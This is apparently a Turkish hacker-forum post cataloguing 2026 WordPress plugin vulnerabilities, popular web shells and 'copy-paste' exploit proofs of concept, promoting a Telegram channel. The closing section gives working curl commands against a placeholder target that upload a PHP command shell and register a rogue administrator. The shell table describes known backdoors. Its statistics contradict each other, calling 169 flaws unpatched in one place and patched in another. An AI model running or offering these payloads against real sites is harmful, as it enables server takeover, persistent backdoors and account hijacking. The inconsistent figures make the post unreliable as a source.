-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
🐘 WORDPRESS 2026: 200+ GÜNCEL ZAFİYET VE WEB SHELL ARŞİVİ
WordPress ekosistemi, sadece bir haftada 185 yeni güvenlik açığı keşfedildi, bunların 169’u için hala yama yok veya yeni yayınlandı. Aşağıda, son günlerde keşfedilen en kritik zafiyetleri ve kullanılan shell’leri kısa ve öz, arşiv tadında bulacaksınız.
🔥 KRİTİK ZAFİYETLER (CVSS 8.0+)
Kimlik Doğrulamasız RCE / Shell Upload (En Tehlikelileri)
| CVE ID / Referans | Eklenti / Tema | Zafiyet Türü | Versiyonlar | İstismar |
|---|---|---|---|---|
| CVE-2026-1357 | WPvivid Backup & Migration | Kimlik Doğrulamasız RCE | <= 0.9.123 | wpvivid_action=send_to_site ile doğrudan PHP shell yükleme ve çalıştırma |
| CVE-2026-0740 | Ninja Forms – File Uploads | Kimlik Doğrulamasız Arbitrary File Upload | <= 3.3.26 | Dosya tipi kontrolü ve yetki kontrolü yok, direkt shell yükleme |
| CVE-2026-1555 | WebStack Theme | Kimlik Doğrulamasız Arbitrary File Upload | <= 1.2024 | img_upload AJAX işleyicisi üzerinden keyfi dosya yükleme → RCE |
| CVE-2026-27540 | WooCommerce Wholesale Lead Capture | Kimlik Doğrulamasız Arbitrary File Upload | Tüm versiyonlar | wwlc_file_upload_handler AJAX, hiçbir yetki kontrolü olmadan çalışır |
| CVE-2026-3584 | Kali Forms | Kimlik Doğrulamasız RCE | <= 2.4.9 | Doğrudan uzaktan kod çalıştırma |
| CVE-2026-1405 | Slider Future | Kimlik Doğrulamasız Arbitrary File Upload | Tüm versiyonlar | Kısıtlama olmadan keyfi dosya yükleme → tam sistem ele geçirme |
| CVE-2026-6518 | CMP – Coming Soon & Maintenance | Kimlik Doğrulamasız Arbitrary File Upload | <= 4.1.16 | cmp_theme_update_install AJAX ile uzaktan ZIP indirip çıkartarak RCE |
| CVE-2026-5718 | Drag and Drop Multiple File Upload for CF7 | Kimlik Doğrulamasız Arbitrary File Upload | <= 1.3.9.6 | PHP dosyalarının yüklenmesine izin verir → RCE |
Kimlik Doğrulamalı RCE / Yetki Yükseltme
| CVE ID / Referans | Eklenti / Tema | Zafiyet Türü | Versiyonlar | İstismar |
|---|---|---|---|---|
| CVE-2026-27542 | WooCommerce Wholesale Lead Capture | Kimlik Doğrulamasız Yetki Yükseltme | Tüm versiyonlar | AJAX işleyicisi, kullanıcı kaydı sırasında admin rolü atamaya izin verir |
| CVE-2026-1756 | WP FOFT Loader | Kimlik Doğrulamalı RCE | <= 2.9.9 | Author seviyesindeki bir kullanıcı bile PHP shell yükleyebilir |
| CVE-2026-25366 | Woody ad snippets | Kimlik Doğrulamalı RCE | <= 2.7.1 | Kod enjeksiyonu ile uzaktan kod çalıştırma |
| CVE-2026-0726 | Nexter Extension | Kimlik Doğrulamasız PHP Object Injection | Tüm versiyonlar | Kimlik doğrulama gerektirmeyen PHP object injection → POP chain varsa RCE |
| CVE-2026-3596 | Riaxe Product Customizer | Kimlik Doğrulamasız Yetki Yükseltme | <= 2.1.2 | AJAX eylemi yetki kontrolü yapmaz |
SQL Enjeksiyonları (Veritabanı Dökümü)
| CVE ID / Referans | Eklenti | Zafiyet Türü | Versiyonlar | İstismar |
|---|---|---|---|---|
| CVE-2026-6080 | Tutor LMS | SQL Injection | <= 3.9.8 | date parametresinde yetersiz kaçış |
| GHSA-Q4M3-X4H7-C3C2 | DirectoryPress | SQL Injection | <= 3.6.26 | packages parametresinde SQL enjeksiyonu |
| CVE-2026-3773 | Accessibility Suite | SQL Injection | <= 4.20 | scan_id parametresi ile kimlik doğrulamalı SQLi |
| CVE-2026-3222 | WP Maps | Blind SQL Injection | <= 4.9.1 | location_id parametresinde time-based blind SQLi |
| CVE-2026-5207 | LifterLMS | SQL Injection | <= 9.2.1 | order parametresinde SQL enjeksiyonu |
Cross-Site Scripting (XSS) – Depolanmış / Kalıcı
| CVE ID / Referans | Eklenti / Tema | Zafiyet Türü | Versiyonlar | İstismar |
|---|---|---|---|---|
| CVE-2026-2602 | Twentig | Stored XSS | <= 1.9.7 | featuredImageSizeWidth parametresinde yetersiz temizleme |
| CVE-2025-13364 | WP Maps | Stored XSS | <= 4.8.7 | put_wpgm kısa kodunda XSS |
| CVE-2026-1398 | Change WP URL | CSRF (XSS) | <= 1.0 | CSRF ile yetkisiz işlem |
| Accessibly Plugin | Accessibly | Stored XSS | <= 3.0.3 | REST API uç noktaları yetki kontrolü yapmaz, kitlesel XSS |
| GHSA-4MCF-JJ9C-GVP6 | Prismatic | Stored XSS | <= 3.7.3 | prismatic_encoded kısa kodunda XSS |
Path Traversal / Arbitrary File Read
| CVE ID / Referans | Eklenti / Tema | Zafiyet Türü | Versiyonlar | İstismar |
|---|---|---|---|---|
| GHSA-J54C-RR2X-FF86 | Drag and Drop Multiple File Upload for CF7 | Path Traversal → Arbitrary File Read | <= 1.3.9.6 | Kimlik doğrulamasız herhangi bir dosyayı okuma |
| CVE-2026-4373 | JetFormBuilder | Path Traversal → Arbitrary File Read | <= 3.5.6.2 | Kullanıcıdan gelen dosya yollarını doğrulamaz |
Tedarik Zinciri Saldırısı (Supply Chain Attack)
| Referans | Eklenti | Açıklama |
|---|---|---|
| Smart Slider | Smart Slider 3 | 7 Nisan 2026’da eklentinin güncelleme sistemi ele geçirildi. Sürüm 3.5.1.35, sofistike bir uzaktan erişim aracı (RAT) içeriyordu. Güncelleme yapan her site otomatik olarak tehlikeye girdi |
🐚 WEB SHELL LİSTESİ (2026)
Aşağıdaki shell’ler, 2026’da saldırganlar tarafından en çok kullanılan veya yeni keşfedilen arka kapılardır.| Shell Adı | Tür | Özellikler / Tespit İpucu |
|---|---|---|
| EncystPHP | PHP Web Shell | FreePBX (CVE-2025-64328) üzerinden yayılıyor. Uzaktan komut çalıştırma, kalıcılık mekanizmaları ve başka shell’ler dağıtma yeteneği var. INJ3CTOR3 grubu tarafından kullanılıyor |
| Janus Varyantları: konzz & jfm | PHP Web Shell (WordPress eklentisi kılığında) | WordPress hedefli. Kodlarını gizlemek için hexadecimal (\144\151\163\160\154\141\x79) ve octal string’ler kullanıyor. eval veya system gibi anahtar kelimelerden kaçıyor |
| Turkshell.php | PHP Web Shell | SANS ISC tarafından gözlemlendi. Varsayılan kurulumda /turkshell.php yoluyla erişiliyor. Önceden tanımlanmış arka kapı kimlik bilgileri içerebilir |
| Cookie-Controlled PHP Web Shell | PHP Web Shell | HTTP çerezlerini (cookies) komut kontrol kanalı olarak kullanıyor. Microsoft Defender araştırma ekibi tarafından keşfedildi. Linux sunucularda Cron job ile kalıcılık sağlıyor |
| Monstra CMS 3.0.4 Shell | PHP Shell | CSRF ile admin arayüzü üzerinden shell yükleme zafiyeti |
| Turkish Hack Shell (Jsp) | JSP Shell | Türk hacker gruplarının kullandığı klasik shell. Base64 ile şifrelenmiş komutlar çalıştırır |
| WSO (Web Shell by oRb) | PHP Shell | Efsanevi WSO shell. Dosya yöneticisi, komut çalıştırma, SQL sorgulama |
| C99 (r57) | PHP Shell | Çok eski ama hala tespit edilen shell’lerden. Klasik komut yürütme, dosya yükleme |
| b374k | PHP Shell | Web tabanlı dosya yöneticisi, kod editörü, veritabanı yöneticisi |
| p0wny-shell | PHP Shell | Tek dosyalı, hafif, hızlı; sadece komut çalıştırır |
| Shellbot | PHP Shell | C2 sunucusu ile haberleşen, komut alan gelişmiş bir web shell |
| Weird (W4SP) | Python | W4SP Stealer ile bağlantılı; kurbanın token’larını ve şifrelerini toplar |
🔧 EN HIZLI EXPLOİT POC’LAR (Kopyala-Yapıştır)
CVE-2026-1357 (WPvivid Backup & Migration – Unauthenticated RCE)
bashcurl -X POST https://hedef.com/wp-admin/admin-ajax.php \
-d "action=wpvivid_send_to_site" \
-d "file_path=../../../wp-content/uploads/shell.php" \
-d "file_content=<?php system($_GET['cmd']); ?>"
CVE-2026-0740 (Ninja Forms File Upload – Unauthenticated Shell Upload)
bashcurl -F "[email protected]" https://hedef.com/?nf_fu_upload=1
CVE-2026-27542 (WooCommerce Lead Capture – Unauthenticated Admin Ekleme)
bashcurl -X POST https://hedef.com/wp-admin/admin-ajax.php \
-d "action=wwlc_create_user" \
-d "username=hacker" \
-d "email=[email protected]" \
-d "password=Pass123" \
-d "wp_capabilities[administrator]=1"
📊 ÖZET İSTATİSTİKLER (2026)
| Metrik | Değer |
|---|---|
| Son 1 haftada keşfedilen toplam zafiyet | 185 (161 eklenti, 24 tema) |
| Yamalı / Yama bekleyen | 169 eklenti için yama mevcut, 16 eklenti hala açık |
| En yaygın zafiyet türü | Cross-Site Scripting (XSS) ve SQL Injection |
| En tehlikeli tür (RCE / Shell Upload) | 15+ kritik zafiyet |
| Aktif kötücül eklenti kampanyaları | Janus (konzz, jfm) ve Smart Slider Supply Chain |
@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
